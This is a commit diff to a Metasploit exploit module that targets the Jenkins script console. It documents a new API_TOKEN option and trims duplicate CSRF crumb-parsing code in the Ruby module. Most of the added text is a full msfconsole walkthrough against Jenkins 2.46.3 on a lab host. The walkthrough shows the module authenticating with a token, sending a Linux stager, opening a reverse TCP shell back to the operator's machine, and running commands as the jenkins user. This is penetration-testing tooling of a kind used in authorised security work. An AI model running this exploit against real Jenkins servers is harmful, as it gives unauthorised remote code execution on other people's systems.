Added docs, minor code tweak to remove duplication.
parent
49d998f7d9
commit
58cd432120
|
@ -36,7 +36,13 @@
|
|||
|
||||
A password to an account that has access to the script console. This is only
|
||||
necessary if the Jenkins instance has been configured to require
|
||||
authentication.
|
||||
authentication and you aren't using an API_TOKEN (see below).
|
||||
|
||||
**API_TOKEN**
|
||||
|
||||
An API token to an account that has access to the script console. This is only
|
||||
necessary if the Jenkins instance has been configured to require
|
||||
authentication and you aren't using a PASSWORD (see above).
|
||||
|
||||
## Scenarios
|
||||
|
||||
|
@ -128,3 +134,42 @@
|
|||
meterpreter >
|
||||
|
||||
```
|
||||
|
||||
Example usage against a Linux x64 bit target running Jenkins 2.46.3.
|
||||
|
||||
```
|
||||
msf > use exploit/multi/http/jenkins_script_console
|
||||
msf exploit(jenkins_script_console) > set RHOST 172.17.0.1
|
||||
RHOST => 172.17.0.1
|
||||
msf exploit(jenkins_script_console) > set RPORT 8080
|
||||
RPORT => 8080
|
||||
msf exploit(jenkins_script_console) > set TARGETURI /
|
||||
TARGETURI => /
|
||||
msf exploit(jenkins_script_console) > set USERNAME admin
|
||||
USERNAME => admin
|
||||
msf exploit(jenkins_script_console) > set API_TOKEN 24e0b80d009ed12590ff85866d88c00d
|
||||
API_TOKEN => 24e0b80d009ed12590ff85866d88c00d
|
||||
msf exploit(jenkins_script_console) > set TARGET 1
|
||||
TARGET => 1
|
||||
msf exploit(jenkins_script_console) > set PAYLOAD linux/x86/shell/reverse_tcp
|
||||
PAYLOAD => linux/x86/shell/reverse_tcp
|
||||
msf exploit(jenkins_script_console) > set LHOST 10.0.2.4
|
||||
LHOST => 10.0.2.4
|
||||
msf exploit(jenkins_script_console) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 10.0.2.4:4444
|
||||
[*] Checking access to the script console
|
||||
[*] Authenticating with token...
|
||||
[*] Using CSRF token: 'd41639a6f5721760a8ee3df5d6a71eec' (Jenkins-Crumb style)
|
||||
[*] 172.17.0.1:8080 - Sending Linux stager...
|
||||
[*] Sending stage (36 bytes) to 172.17.0.2
|
||||
[*] Command shell session 1 opened (10.0.2.4:4444 -> 172.17.0.2:53962) at 2017-06-19 16:55:42 -0500
|
||||
[!] Deleting /tmp/AsqL5Pg payload file
|
||||
|
||||
whoami
|
||||
jenkins
|
||||
id
|
||||
uid=1000(jenkins) gid=1000(jenkins) groups=1000(jenkins)
|
||||
uname -a
|
||||
Linux b4b4e715101e 4.4.0-79-generic #100-Ubuntu SMP Wed May 17 19:58:14 UTC 2017 x86_64 GNU/Linux
|
||||
```
|
||||
|
|
|
@ -193,10 +193,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
if res.body =~ /"\.crumb", "([a-z0-9]*)"/
|
||||
print_status("Using CSRF token: '#{$1}' (.crumb style)")
|
||||
@crumb = {:name => '.crumb', :value => $1}
|
||||
elsif res.body =~ /crumb\.init\("Jenkins-Crumb", "([a-z0-9]*)"\)/
|
||||
print_status("Using CSRF token: '#{$1}' (Jenkins-Crumb style)")
|
||||
@crumb = {:name => 'Jenkins-Crumb', :value => $1}
|
||||
elsif res.body =~ /"crumb":"([a-z0-9]*)"/
|
||||
elsif res.body =~ /crumb\.init\("Jenkins-Crumb", "([a-z0-9]*)"\)/ || res.body =~ /"crumb":"([a-z0-9]*)"/
|
||||
print_status("Using CSRF token: '#{$1}' (Jenkins-Crumb style)")
|
||||
@crumb = {:name => 'Jenkins-Crumb', :value => $1}
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue